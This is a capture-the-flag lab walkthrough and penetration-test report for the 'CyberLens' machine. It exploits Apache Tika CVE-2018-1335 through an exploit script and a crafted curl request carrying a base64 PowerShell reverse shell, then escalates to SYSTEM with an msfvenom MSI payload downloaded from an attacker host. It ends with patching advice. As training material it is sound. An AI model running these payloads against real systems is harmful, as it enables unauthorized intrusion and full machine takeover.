Skip to main content

CyberLens

export TARGET_IP=10.10.195.124
sudo nano /etc/hosts # Add: $TARGET_IP cyberlens.thm
nmap -p- --min-rate 5000 $TARGET_IP
Not shown: 65417 closed tcp ports (reset), 101 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
61777/tcp open unknown

In http://cyberlens.thm/about.html we find "CyberLens Image Extractor", a metadata extractor. Checking the request with Burpsuit we find the end point at port 61777, which might be resposible for the metadata extraction.

PUT /meta HTTP/1.1
Host: cyberlens.thm:61777

Going to http://cyberlens.thm:61777 we find "Apache Tika 1.17 Server". From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server (CVE-2018-1335).

nc -lvnp 6666
git clone https://github.com/canumay/cve-2018-1335
cd cve-2018-1335
python3 exploit.py $TARGET_IP 61777 "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMgAuADEANwAuADQANAAiACwANgA2ADYANgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="

You can also do it manually:

curl -X PUT http://cyberlens.thm:61777/meta \
-H "X-Tika-OCRTesseractPath: \"cscript\"" \
-H "X-Tika-OCRLanguage: //E:Jscript" \
-H "Expect: 100-continue" \
-H "Content-type: image/jp2" \
-H "Connection: close" \
-d "var oShell = WScript.CreateObject(\"WScript.Shell\"); var oExec = oShell.Exec('cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMgAuADEANwAuADQANAAiACwANgA2ADYANgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=');"

Or using Metasploit, whatever.

I used PowerShell #3 (Base64) from https://www.revshells.com/.

So we are in.

whoami # cyberlens\cyberlens
Get-MpComputerStatus # Check if any protection, like antivirus or Windows Defender, is up and running.

Neither of the protection mechanisms is enabled or running.

Downlaod PrivescCheck.ps1 (https://github.com/itm4n/PrivescCheck) from the Attacker Machine:

Attacker Machine
# Inside the directory where PrivescCheck.ps1 is:
python3 -m http.server 80
Target Machine
curl http://10.2.17.44:80/PrivescCheck.ps1 -o PrivescCheck.ps1
. .\PrivescCheck.ps1; Invoke-PrivescCheck

We see that AlwaysInstallElevated might be enabled. If AlwaysInstallElevated is enabled on a target, it allows us to exploit it by crafting our own malicious MSI file that gets executed in the context of the local SYSTEM account.

Once created, we can download and execute the malicious file on the victim as ANY user, and it will run under the context of the local SYSTEM account. This means that by placing malicious shell code in an MSI file, we are able to obtain a reverse shell as SYSTEM.

´´´ ???????????????????????????????????????????????????????????????? ? CATEGORY ? TA0004 - Privilege Escalation ? ? NAME ? AlwaysInstallElevated ? ? TYPE ? Base ? ???????????????????????????????????????????????????????????????? ? Check whether the 'AlwaysInstallElevated' policy is enabled ? ? system-wide and for the current user. If so, the current ? ? user may install a Windows Installer package with elevated ? ? (SYSTEM) privileges. ? ????????????????????????????????????????????????????????????????

LocalMachineKey : HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer LocalMachineValue : AlwaysInstallElevated LocalMachineData : 1 CurrentUserKey : HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer CurrentUserValue : AlwaysInstallElevated CurrentUserData : 1 Description : AlwaysInstallElevated is enabled in both HKLM and HKCU.

[*] Status: Vulnerable - Severity: High - Execution time: 00:00:00.008 ´´´

We craft a simple Windows reverse shell via msfvenom in the file format of an MSI.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.2.17.44 LPORT=8888 -a x64 --platform Windows -f msi -o rev.msi
nc -lvnp 8888
Attacker Machine
python3 -m http.server 80
Target Machine
curl http://10.2.17.44:80/rev.msi -o rev.msi
.\rev.msi
Listening port 8888
whoami # nt authority\system
cd C:\Users\Administrator\Desktop
type admin.txt

This report details the findings of a penetration test conducted against the target system "CyberLens." The assessment revealed a critical vulnerability (CVE-2018-1335) in Apache Tika, a component of the target's web application. This vulnerability allowed for remote code execution (RCE), leading to an initial foothold on the system. Further investigation revealed a privilege escalation vulnerability through the "AlwaysInstallElevated" Windows policy, ultimately granting SYSTEM-level access to the target machine.

Phase 1: Reconnaissance and Enumeration

The target IP address was identified as 10.10.195.124. To facilitate access, the /etc/hosts file on the attacking machine was modified to map the hostname cyberlens.thm to the target IP:

export TARGET_IP=10.10.195.124
sudo nano /etc/hosts # Add: $TARGET_IP cyberlens.thm

Explanation: The /etc/hosts file is used for local hostname resolution. This entry allows us to use the user-friendly name cyberlens.thm instead of the IP address throughout the penetration test.

1.2. Port Scanning

A comprehensive port scan was performed using nmap to identify open ports and running services:

nmap -p- --min-rate 5000 $TARGET_IP

Results:

PORT      STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
61777/tcp open unknown

Phase 2: Vulnerability Analysis and Exploitation

2.1. Web Application Analysis

Browsing to http://cyberlens.thm revealed a website with an "About" page (http://cyberlens.thm/about.html) mentioning "CyberLens Image Extractor," a metadata extraction tool.

Using Burp Suite to intercept the HTTP requests, we observed a PUT request to /meta on port 61777 when interacting with the image extractor:

PUT /meta HTTP/1.1
Host: cyberlens.thm:61777

Explanation: Burp Suite is a web application security testing tool that allows us to intercept, inspect, and modify HTTP traffic. This PUT request indicates that the metadata extraction functionality likely resides on the unusual port 61777.

2.2. Apache Tika Vulnerability (CVE-2018-1335)

Navigating to http://cyberlens.thm:61777 displayed "Apache Tika 1.17 Server." Research revealed that Apache Tika versions 1.7 to 1.17 are vulnerable to command injection (CVE-2018-1335).

Exploitation:

  1. Reverse Shell Setup: A netcat listener was started on the attacking machine to receive the reverse shell connection:

    nc -lvnp 6666
  2. Exploit Execution: The cve-2018-1335 exploit from GitHub was used. This exploit leverages the vulnerability to execute arbitrary commands on the target system. The command executes a base64-encoded PowerShell reverse shell (PowerShell #3 (Base64) from https://www.revshells.com/).

    git clone https://github.com/canumay/cve-2018-1335
    cd cve-2018-1335
    python3 exploit.py $TARGET_IP 61777 "powershell -e [BASE64_ENCODED_PAYLOAD]"

    This establishes a reverse shell, giving the attacker command-line access to the target machine.

  3. Manual Exploitation (Alternative): The vulnerability can also be exploited manually using curl:

    curl -X PUT http://cyberlens.thm:61777/meta \
    -H "X-Tika-OCRTesseractPath: \"cscript\"" \
    -H "X-Tika-OCRLanguage: //E:Jscript" \
    -H "Expect: 100-continue" \
    -H "Content-type: image/jp2" \
    -H "Connection: close" \
    -d "var oShell = WScript.CreateObject(\"WScript.Shell\"); var oExec = oShell.Exec('cmd /c powershell -e [BASE64_ENCODED_PAYLOAD]');"

    Explanation: This curl command sends a crafted HTTP PUT request with specific headers that exploit the Tika vulnerability: *X-Tika-OCRTesseractPath and X-Tika-OCRLanguage: These headers are manipulated to inject the command. *Content-type: This header should be image related, according to the vulnerability specification.

    This is a manual demonstration of how the exploit works, bypassing the need for the Python script.

  4. Reverse Shell Payload Generation (Example): Websites like https://www.revshells.com/ can be used to generate various reverse shell payloads. The PowerShell #3 (Base64) option provides a convenient, encoded payload. It's crucial to use reliable sources and understand the payload you are using.

Phase 3: Privilege Escalation

3.1. Initial Foothold and System Enumeration

After successful exploitation, we gained a reverse shell as the cyberlens\cyberlens user:

whoami  # Output: cyberlens\cyberlens

Initial system checks were performed:

Get-MpComputerStatus  # Check Windows Defender status

Explanation: Get-MpComputerStatus checks the status of Windows Defender. This is important to understand the security posture of the system and anticipate potential obstacles. In this case, it was found to be disabled, simplifying the escalation process.

3.2. Automated Privilege Escalation Checks

The PrivescCheck.ps1 script was used to identify potential privilege escalation vectors. The script checks for a variety of common misconfigurations and vulnerabilities.

Attacker Machine
# Inside the directory where PrivescCheck.ps1 is:
python3 -m http.server 80 # Host a simple HTTP server
Target Machine
curl http://[ATTACKER_IP]:80/PrivescCheck.ps1 -o PrivescCheck.ps1
. .\PrivescCheck.ps1; Invoke-PrivescCheck # Load and run the script

Explanation:

  • curl ... -o ...: Downloads the script from the attacker's web server.
  • . .\PrivescCheck.ps1: The dot-sourcing operator (.) executes the script in the current scope, making its functions available.
  • Invoke-PrivescCheck: This is the main function of the script that performs the checks.

3.3. AlwaysInstallElevated Vulnerability

PrivescCheck.ps1 identified the AlwaysInstallElevated policy as being enabled:

????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? AlwaysInstallElevated ?
? TYPE ? Base ?
????????????????????????????????????????????????????????????????
? Check whether the 'AlwaysInstallElevated' policy is enabled ?
? system-wide and for the current user. If so, the current ?
? user may install a Windows Installer package with elevated ?
? (SYSTEM) privileges. ?
????????????????????????????????????????????????????????????????

LocalMachineKey : HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
LocalMachineValue : AlwaysInstallElevated
LocalMachineData : 1
CurrentUserKey : HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
CurrentUserValue : AlwaysInstallElevated
CurrentUserData : 1
Description : AlwaysInstallElevated is enabled in both HKLM and HKCU.

[*] Status: Vulnerable - Severity: High - Execution time: 00:00:00.008

Explanation: AlwaysInstallElevated is a Windows policy that, when enabled, allows any user to install MSI (Microsoft Installer) packages with SYSTEM-level privileges. This is a significant security risk because it bypasses normal user access controls. The registry keys HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer control this policy.

3.4. MSI-Based Privilege Escalation

  1. Crafting a Malicious MSI: msfvenom was used to create an MSI package containing a reverse shell payload:

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=8888 -a x64 --platform Windows -f msi -o rev.msi

    Explanation:

    • -p windows/x64/shell_reverse_tcp: Specifies a 64-bit Windows reverse shell payload.
    • LHOST=[ATTACKER_IP]: Sets the attacker's IP address for the reverse shell connection.
    • LPORT=8888: Sets the port for the reverse shell connection.
    • -a x64: Specifies the architecture (64-bit).
    • --platform Windows: Specifies the target operating system.
    • -f msi: Specifies the output format as an MSI package.
    • -o rev.msi: Sets the output file name.
  2. Hosting the MSI: The attacker's machine hosted the malicious MSI file:

    python3 -m http.server 80
  3. Downloading and Executing the MSI: The MSI was downloaded and executed on the target machine:

    Target Machine
    curl http://[ATTACKER_IP]:80/rev.msi -o rev.msi
    .\rev.msi
  4. Receiving the SYSTEM Shell: A netcat listener was set up on the attacker's machine to receive the elevated reverse shell:

    nc -lvnp 8888
  5. Verification: Once the connection was established, the whoami command confirmed SYSTEM-level access:

    Listening port 8888
    whoami  # Output: nt authority\system
  6. Accessing Sensitive Data: With SYSTEM privileges, the administrator's files could be accessed:

    cd C:\Users\Administrator\Desktop
    type admin.txt

Recommendations

  1. Patch Apache Tika: Immediately update Apache Tika to a version that is not vulnerable to CVE-2018-1335 (version 1.18 or later).
  2. Disable AlwaysInstallElevated: Disable the "AlwaysInstallElevated" policy in both the HKLM and HKCU registry hives. This is a critical security best practice.
  3. Enable Windows Defender: Ensure that Windows Defender (or a suitable alternative antivirus/endpoint protection solution) is enabled and up-to-date.